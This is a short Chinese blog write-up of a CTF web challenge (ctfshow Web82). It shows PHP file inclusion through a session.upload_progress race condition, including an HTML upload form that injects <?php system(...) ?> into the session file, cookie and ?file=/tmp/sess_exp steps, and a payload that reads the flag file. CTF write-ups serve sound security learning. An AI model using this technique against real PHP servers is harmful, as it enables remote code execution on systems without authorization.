文件包涵条件竞争(ctfshow82)

小春学渗透2024-07-30 23:28

Web82

利用 session.upload_progress 包含文件漏洞

<!DOCTYPE html>

<html>

<body>

<form action="https://09558c1b-9569-4abd-bf78-86c4a6cb6608.challenge.ctf.show//" method="POST" enctype="multipart/form-data">

<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls'); ?>" />

<input type="file" name="file" />

<input type="submit" value="submit" />

</form>

</body>

</html>

<?php

session_start();

?>

修改url地址,修改命令

上传文件bp抓包

添加cookie,清除参数

Cookie: PHPSESSID=exp

?file=/tmp/sess_exp

抓包发送到攻击模块

开始攻击

<?php system('cat fl0g.php'); ?>

相关推荐
千枫s5 小时前
kali 免杀木马
网络安全
AI_Claude_code6 小时前
ZLibrary访问困境方案三:Web代理与轻量级转发服务的搭建与优化
爬虫·python·web安全·搜索引擎·网络安全·web3·httpx
乾元7 小时前
《硅基之盾》番外篇二:算力底座的暗战——智算中心 VXLAN/EVPN 架构下的多租户隔离与防御
网络·人工智能·网络安全·架构
pencek8 小时前
HakcMyVM-CoffeeShop
网络安全
Pure_White_Sword8 小时前
[广东省大学生攻防大赛 2022]pyre
网络安全·ctf·reverse·逆向工程
pencek9 小时前
HackMyVM-XMAS
网络安全
千枫s10 小时前
kali arp欺骗
网络安全
每天一把堆栈11 小时前
pctf-pwn(2025)
网络安全·pwn
菩提小狗11 小时前
每日安全情报报告 · 2026-04-10
网络安全·漏洞·cve·安全情报·每日安全
JS_SWKJ11 小时前
网闸核心技术详解:数据“安全渡河”的物理密码
网络安全
热门推荐
01GitHub 镜像站点02一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛03OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程04VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)05AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南06Oh My Codex 快速使用指南07实测!Gemma 4 成功跑在安卓手机上:离线 AI 助手终于来了08【STM32】HAL库 CubeMX 教程 --- 通用定时器 TIM2 定时09基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南10CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南